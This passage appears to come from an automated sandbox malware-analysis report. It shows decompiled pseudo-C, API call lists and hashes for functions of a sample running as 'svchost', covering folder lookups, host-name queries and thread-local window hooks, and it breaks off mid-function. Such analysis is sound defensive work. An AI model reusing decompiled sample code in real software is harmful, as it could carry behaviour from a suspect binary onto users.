    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,?,00000000,00000000), ref: 0047D33C
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0047D388
    • CompareStringW.KERNEL32(004564F6,00000000,00000000,00000000,?,00000000,?,00000000), ref: 0047D3A0
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ByteCharCompareMultiStringWide$Info
    • String ID:
    • API String ID: 1651298574-0
    • Opcode ID: 5cd38332acad25a66700c0e1fdee4d06cde6f03966b1295a37150fc273a75521
    • Instruction ID: ec8d8a2cf967f987526567af7a716a9f018f116a45b960af5b78a0967a218efd
    • Opcode Fuzzy Hash: 5cd38332acad25a66700c0e1fdee4d06cde6f03966b1295a37150fc273a75521
    • Instruction Fuzzy Hash: 4271BD32D10249AFCF219F54CD819EF7BBAEF45310F14816BF959A6221C3398852DB99
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0046EB40 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 97COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 486 46eb40-46eb65 487 46eb67-46eb6a 486->487 488 46ebdb-46ebde 486->488 487->488 489 46eb6c-46eb6f 487->489 490 46ebf2-46ebf5 488->490 491 46ebe0-46ebf0 GetWindowsDirectoryA 488->491 492 46eb71-46eb76 489->492 493 46eb78-46eb7b 489->493 495 46ebf7-46ec07 GetSystemDirectoryA 490->495 496 46ec09-46ec0c 490->496 494 46ec1e-46ec28 491->494 497 46ebc1-46ebd3 SHGetSpecialFolderPathA 492->497 498 46eb84-46eb87 493->498 499 46eb7d-46eb82 493->499 500 46ec5e-46ec65 494->500 502 46ec2a-46ec3c 494->502 495->494 496->500 501 46ec0e-46ec18 GetTempPathA 496->501 497->500 503 46ebd9 497->503 504 46eb90-46eb93 498->504 505 46eb89-46eb8e 498->505 499->497 501->494 506 46ec3e-46ec43 502->506 507 46ec4f-46ec5c call 46eaf0 502->507 503->502 509 46eb95-46eb9a 504->509 510 46eb9c-46eb9f 504->510 505->497 506->507 511 46ec45-46ec4a 506->511 507->500 509->497 513 46eba1-46eba6 510->513 514 46eba8-46ebab 510->514 511->507 513->497 515 46ebb4-46ebbe 514->515 516 46ebad-46ebb2 514->516 515->497 516->497
    C-Code - Quality: 65%
    			E0046EB40(void* __edi, intOrPtr* _a4, signed int* _a12) {
				char _v260;
				signed int _t17;
				int _t18;
				intOrPtr _t20;
				void* _t24;
				signed int _t25;
				void* _t28;
				void* _t33;
				intOrPtr* _t36;
				char* _t37;

				_t33 = __edi;
				_t37 =  &_v260;
				_t36 = _a4;
				_v260 = 0;
				 *_t36 = 0;
				_t17 =  *_a12;
				if(_t17 < 1 || _t17 > 8) {
					if(_t17 != 9) {
						if(_t17 != 0xa) {
							if(_t17 != 0xb) {
								goto L28;
							}
							_t18 = GetTempPathA(0x104,  &_v260);
							L23:
							_t25 = 0;
							asm("sbb eax, eax");
							_t17 =  ~_t18;
							if(_t17 == 0) {
								goto L28;
							}
							goto L24;
						}
						_t18 = GetSystemDirectoryA( &_v260, 0x104);
						goto L23;
					}
					_t18 = GetWindowsDirectoryA( &_v260, 0x104);
					goto L23;
				} else {
					if(_t17 != 1) {
						if(_t17 != 2) {
							if(_t17 != 3) {
								if(_t17 != 4) {
									if(_t17 != 5) {
										if(_t17 != 6) {
											asm("sbb eax, eax");
											_t24 = ( ~(_t17 - 7) & 0x00000013) + 7;
										} else {
											_t24 = 2;
										}
									} else {
										_t24 = 0xb;
									}
								} else {
									_t24 = 0x14;
								}
							} else {
								_t24 = 0x10;
							}
						} else {
							_t24 = 6;
						}
					} else {
						_t24 = 5;
					}
					_t25 =  &_v260;
					_t17 =  *0x4923c8(0, _t25, _t24, 0); // executed
					if(_t17 == 0) {
						L28:
						return _t17;
					}
					L24:
					_push(_t33);
					asm("repne scasb");
					_t28 =  !(_t25 | 0xffffffff) - 1;
					if(_t28 > 0 && _t37[_t28 + 3] != 0x5c) {
						_t37[_t28 + 4] = 0x5c;
						_t37[_t28 + 5] = 0;
					}
					_t20 = E0046EAF0(_t28,  &_v260);
					 *_t36 = _t20;
					return _t20;
				}
			}













    0x0046eb40
    0x0046eb40
    0x0046eb4e
    0x0046eb55
    0x0046eb5a
    0x0046eb60
    0x0046eb65
    0x0046ebde
    0x0046ebf5
    0x0046ec0c
    0x00000000
    0x00000000
    0x0046ec18
    0x0046ec1e
    0x0046ec1e
    0x0046ec22
    0x0046ec24
    0x0046ec28
    0x00000000
    0x00000000
    0x00000000
    0x0046ec28
    0x0046ec01
    0x00000000
    0x0046ec01
    0x0046ebea
    0x00000000
    0x0046eb6c
    0x0046eb6f
    0x0046eb7b
    0x0046eb87
    0x0046eb93
    0x0046eb9f
    0x0046ebab
    0x0046ebb9
    0x0046ebbe
    0x0046ebad
    0x0046ebad
    0x0046ebad
    0x0046eba1
    0x0046eba1
    0x0046eba1
    0x0046eb95
    0x0046eb95
    0x0046eb95
    0x0046eb89
    0x0046eb89
    0x0046eb89
    0x0046eb7d
    0x0046eb7d
    0x0046eb7d
    0x0046eb71
    0x0046eb71
    0x0046eb71
    0x0046ebc3
    0x0046ebcb
    0x0046ebd3
    0x0046ec65
    0x0046ec65
    0x0046ec65
    0x0046ec2a
    0x0046ec2a
    0x0046ec34
    0x0046ec38
    0x0046ec3c
    0x0046ec45
    0x0046ec4a
    0x0046ec4a
    0x0046ec54
    0x0046ec5c
    0x00000000
    0x0046ec5c

    APIs
    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,?,00000000), ref: 0046EBCB
    • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 0046EBEA
    • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 0046EC01
    • GetTempPathA.KERNEL32(00000104,00000000), ref: 0046EC18
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: DirectoryPath$FolderSpecialSystemTempWindows
    • String ID: \$\
    • API String ID: 2721284240-164819647
    • Opcode ID: 80a58efe848c513585cf2befe566984d6504763871e6425707f96f1a23fbb78b
    • Instruction ID: 232d4b461996c255ed3f04de68dca5527e98b65d9d739a8ccd85a638c7d2a7e5
    • Opcode Fuzzy Hash: 80a58efe848c513585cf2befe566984d6504763871e6425707f96f1a23fbb78b
    • Instruction Fuzzy Hash: 2331D9B95082419AEB24C626C985B7B76E0D791F10F144D2FE183C62C0F6BDD885979B
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004891F9 Relevance: 9.0, APIs: 6, Instructions: 35COMMON
    Download Yara Rule

    Control-flow Graph

    C-Code - Quality: 84%
    			E004891F9(void* __ecx) {
				intOrPtr _t6;
				struct HDC__* _t17;
				void* _t18;

				_t18 = __ecx;
				_t6 =  *((intOrPtr*)( *0x492520))(0xb); // executed
				 *((intOrPtr*)(__ecx + 8)) = _t6;
				 *((intOrPtr*)(_t18 + 0xc)) = GetSystemMetrics(0xc);
				if( *((intOrPtr*)(_t18 + 0x68)) == 0) {
					E0048D79C();
				} else {
					E0048D76C();
				}
				_t17 = GetDC(0);
				 *((intOrPtr*)(_t18 + 0x18)) = GetDeviceCaps(_t17, 0x58);
				 *((intOrPtr*)(_t18 + 0x1c)) = GetDeviceCaps(_t17, 0x5a);
				return ReleaseDC(0, _t17);
			}






    0x00489202
    0x00489206
    0x0048920a
    0x00489213
    0x00489216
    0x0048921f
    0x00489218
    0x00489218
    0x00489218
    0x00489232
    0x0048923c
    0x00489244
    0x00489250

    APIs
    • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 00489206
    • GetSystemMetrics.USER32(0000000C), ref: 0048920D
    • GetDC.USER32(00000000), ref: 00489226
    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00489237
    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0048923F
    • ReleaseDC.USER32(00000000,00000000), ref: 00489247
      • Part of subcall function 0048D76C: GetSystemMetrics.USER32(00000002), ref: 0048D77E
      • Part of subcall function 0048D76C: GetSystemMetrics.USER32(00000003), ref: 0048D788
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
    • String ID:
    • API String ID: 1031845853-0
    • Opcode ID: f8352d8550c19259b34f5e3dc6f8aa0c84f192fe368e4fff8fd843baca40de77
    • Instruction ID: 8f68e6c57e9ee1f0c0c0324b0bfe65526cfc3aae9d694e8d60acf27de776cb22
    • Opcode Fuzzy Hash: f8352d8550c19259b34f5e3dc6f8aa0c84f192fe368e4fff8fd843baca40de77
    • Instruction Fuzzy Hash: F5F09030540700BFE3207B629C89B2BBBA4EB91751F00483BE205862D0DAB89C058F65
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040B4C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43networkCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 532 40b4c0-40b4e1 call 416160 gethostbyname 535 40b4e3-40b4f3 inet_ntoa 532->535 536 40b51c-40b52f call 4147a0 532->536 535->536 537 40b4f5-40b51b 535->537 537->536
    C-Code - Quality: 50%
    			E0040B4C0(void* __edi, void* __esi, void* __eflags, intOrPtr* _a12) {
				intOrPtr* _v0;
				void _v60;
				void* _t8;
				intOrPtr _t9;
				void* _t11;
				signed int _t19;
				unsigned int _t21;
				signed int _t22;
				void* _t40;
				void* _t42;
				char* _t43;

				_t43 = _t42 - 0x34;
				 *_t43 = 0;
				E00416160(0x4c93b0);
				_t8 =  *0x4926a0( *_a12); // executed
				if(_t8 != 0) {
					_t19 =  *( *( *(_t8 + 0xc)));
					_t11 =  *0x4926c0(_t19);
					if(_t11 != 0) {
						asm("repne scasb");
						_t21 =  !(_t19 | 0xffffffff);
						_t40 = _t11 - _t21;
						_t22 = _t21 >> 2;
						memcpy(_t40 + _t22 + _t22, _t40, memcpy( &_v60, _t40, _t22 << 2) & 0x00000003);
						_t43 = _t43 + 0x18;
					}
				}
				_t9 = E004147A0(_t43, _t43);
				 *_v0 = _t9;
				return _t9;
			}














    0x0040b4c0
    0x0040b4c8
    0x0040b4cd
    0x0040b4d9
    0x0040b4e1
    0x0040b4e8
    0x0040b4eb
    0x0040b4f3
    0x0040b502
    0x0040b504
    0x0040b50a
    0x0040b50e
    0x0040b518
    0x0040b518
    0x0040b51b
    0x0040b4f3
    0x0040b521
    0x0040b52a
    0x0040b52f

    APIs
      • Part of subcall function 00416160: WSAStartup.WS2_32(00000101,?), ref: 0041617D
    • gethostbyname.WS2_32 ref: 0040B4D9
    • inet_ntoa.WS2_32 ref: 0040B4EB
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Startupgethostbynameinet_ntoa
    • String ID: ^I
    • API String ID: 2837760686-3473481074
    • Opcode ID: 29438b83faf2d519c10a2b36849a3bd038b0f68c89d909461575c2a8ad937b35
    • Instruction ID: 376bb157f96a625e2d6d376d204659d3c69f2582d5c4d4c2dcd5816659abe8f1
    • Opcode Fuzzy Hash: 29438b83faf2d519c10a2b36849a3bd038b0f68c89d909461575c2a8ad937b35
    • Instruction Fuzzy Hash: 77014B392142406BC318EB39D844A5BBBE5FBC5310B44866EF91ACB3E5DB78D804CA99
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00487FCD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27threadCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 540 487fcd-487fd6 call 48c6bf 543 487fd8-488003 call 48c48d GetCurrentThreadId SetWindowsHookExA call 48ccdc 540->543 544 48802b 540->544 548 488008-48800e 543->548 549 48801b-48802a call 48cc47 548->549 550 488010-488015 call 48c6bf 548->550 549->544 550->549
    C-Code - Quality: 88%
    			E00487FCD() {
				void* _t6;
				void* _t7;
				struct HHOOK__* _t9;
				void* _t18;

				_t6 = E0048C6BF();
				if( *((char*)(_t6 + 0x14)) == 0) {
					_t7 = E0048C48D();
					_t9 = SetWindowsHookExA(0xffffffff, E00488325, 0, GetCurrentThreadId()); // executed
					_push(E0048C341);
					 *(_t7 + 0x30) = _t9;
					_t18 = E0048CCDC(0x4e14d0);
					if( *((intOrPtr*)(_t18 + 0x14)) != 0) {
						 *((intOrPtr*)(_t18 + 0x14))( *((intOrPtr*)(E0048C6BF() + 8)));
					}
					return E0048CC47(0x4e14cc, E0048D2FF);
				}
				return _t6;
			}







    0x00487fcd
    0x00487fd6
    0x00487fd9
    0x00487ff0
    0x00487ff6
    0x00488000
    0x00488008
    0x0048800e
    0x00488018
    0x00488018
    0x00000000
    0x0048802a
    0x0048802b

    APIs
    • GetCurrentThreadId.KERNEL32 ref: 00487FE0
    • SetWindowsHookExA.USER32(000000FF,00488325,00000000,00000000), ref: 00487FF0
      • Part of subcall function 0048CCDC: __EH_prolog.LIBCMT ref: 0048CCE1
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CurrentH_prologHookThreadWindows
    • String ID: `4
    • API String ID: 2183259885-1416234365
    • Opcode ID: 4173d67ac9d73588770c3c7945d59743cda74723ed26d28d6b5ebad327f5ea93
    • Instruction ID: 7f8a7866a4de8df85c9c429b1798fb5d712ebf34a798087481759412b71a3ca8
    • Opcode Fuzzy Hash: 4173d67ac9d73588770c3c7945d59743cda74723ed26d28d6b5ebad327f5ea93
    • Instruction Fuzzy Hash: 6DF0A0314402506BCB253BB1A95DB1E3690AB00725F054EBFB511571E1CFBC8844876E
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00485152 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25threadCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 555 485152-48516c call 48cc47 558 485199-48519b 555->558 559 48516e-485172 555->559 560 485174-48518f GetCurrentThreadId SetWindowsHookExA 559->560 561 485196 559->561 560->561 562 485191 call 481443 560->562 561->558 562->561
    C-Code - Quality: 47%
    			E00485152() {
				char _v0;
				struct HHOOK__* _t6;
				intOrPtr _t9;
				struct HHOOK__* _t10;

				_t6 = E0048CC47(0x4e140c, E0048BFC8);
				_t10 = _t6;
				_t1 =  &_v0; // 0x48525a
				_t9 =  *_t1;
				if( *((intOrPtr*)(_t10 + 0x14)) == _t9) {
					return _t6;
				}
				if( *(_t10 + 0x2c) == 0) {
					_t6 = SetWindowsHookExA(5, E00484F5C, 0, GetCurrentThreadId()); // executed
					 *(_t10 + 0x2c) = _t6;
					if(_t6 == 0) {
						_t6 = E00481443(0x4e140c);
					}
				}
				 *((intOrPtr*)(_t10 + 0x14)) = _t9;
				return _t6;
			}







    0x0048515e
    0x00485163
    0x00485165
    0x00485165
    0x0048516c
    0x0048519b
    0x0048519b
    0x00485172
    0x00485184
    0x0048518c
    0x0048518f
    0x00485191
    0x00485191
    0x0048518f
    0x00485196
    0x00000000

    APIs
      • Part of subcall function 0048CC47: TlsGetValue.KERNEL32(004E141C,00000000,?,00483883,0048BFC8,?,?,00483860,?,0040AB42,000007DD,?,00000000), ref: 0048CC86
    • GetCurrentThreadId.KERNEL32 ref: 00485174
    • SetWindowsHookExA.USER32(00000005,00484F5C,00000000,00000000), ref: 00485184
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CurrentHookThreadValueWindows
    • String ID: ZRH
    • API String ID: 933525246-1860207616
    • Opcode ID: 9dd283d496804b800f3569e32bbc146fc980cc5754bb5bc5d551af73cc464a15
    • Instruction ID: 4655b34550ac9e0bed039503420e30a5a68be570f4b08cf102ebae3f5b1eb490
    • Opcode Fuzzy Hash: 9dd283d496804b800f3569e32bbc146fc980cc5754bb5bc5d551af73cc464a15
    • Instruction Fuzzy Hash: B4E03031600700AEC2347B665809B1F76A4DB90B26F514D2FF20581685C3789845CB7E
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040B480 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18networkCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040B480(void* __eflags) {
				intOrPtr* _v4;
				int _t4;
				intOrPtr _t5;
				void* _t9;
				char* _t10;

				_t10 = _t9 - 0x10;
				 *_t10 = 0;
				E00416160(0x4c93b0);
				_t4 = gethostname(_t10, 0x10); // executed
				if(_t4 == 0xffffffff) {
					 *_t10 = 0;
				}
				_t5 = E004147A0(_t10, _t10);
				 *_v4 = _t5;
				return _t5;
			}








    0x0040b480
    0x0040b488
    0x0040b48d
    0x0040b499
    0x0040b4a2
    0x0040b4a4
    0x0040b4a4
    0x0040b4ae
    0x0040b4b7
    0x0040b4bc

    APIs
      • Part of subcall function 00416160: WSAStartup.WS2_32(00000101,?), ref: 0041617D
    • gethostname.WS2_32(00000000,00000010), ref: 0040B499
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Startupgethostname
    • String ID: ^I
    • API String ID: 615715795-3473481074
    • Opcode ID: aced9dd3c3598f0d29637c94b4bf502a7545c8241c7e732b69d6e68389bc6501
    • Instruction ID: e6f4dec794ddf1a22c407997bf8dd5ec839df19e271f864c85946bdb79e088ca
    • Opcode Fuzzy Hash: aced9dd3c3598f0d29637c94b4bf502a7545c8241c7e732b69d6e68389bc6501
    • Instruction Fuzzy Hash: 54E08678418380ABC304EB74840579B7B99ABD5324F848E5DF195462D2D7BCC448C7AB
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0041B040 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0041B040(int _a4) {

				E00418600(0x4c93b0, _a4); // executed
				ExitProcess(_a4);
			}



    0x0041b04c
    0x0041b055

    APIs
      • Part of subcall function 00418600: GetCurrentThreadId.KERNEL32 ref: 00418625
      • Part of subcall function 00418600: IsWindow.USER32(?), ref: 00418641
      • Part of subcall function 00418600: SendMessageA.USER32(?,000083E7,?,00000000), ref: 0041865A
      • Part of subcall function 00418600: ExitProcess.KERNEL32 ref: 0041866F
    • ExitProcess.KERNEL32 ref: 0041B055
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ExitProcess$CurrentMessageSendThreadWindow
    • String ID: ^I
    • API String ID: 821200049-3473481074
    • Opcode ID: e8f63f49525e361e834760cf8ff17fc70b173e05076e5d784c61bbcf6d7e3302
    • Instruction ID: ca6fd0273a9ac620a5c064f6b42f5121db51dd7d8b2ea8d00eefcf8b29fb6245
    • Opcode Fuzzy Hash: e8f63f49525e361e834760cf8ff17fc70b173e05076e5d784c61bbcf6d7e3302
    • Instruction Fuzzy Hash: 7AC04C75110208BB8744AF99C855D9A379D9B48740700812DBA0587251CF78E98087EE
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0050AC53 Relevance: 3.2, APIs: 2, Instructions: 209memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 48%
    			E0050AC53(void* __eax, void* __edx, intOrPtr* __esi, void* __eflags) {
				CHAR* _v8;
				intOrPtr* _v24;
				struct _STARTUPINFOA _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v807;
				char _v811;
				char _v815;
				intOrPtr _v819;
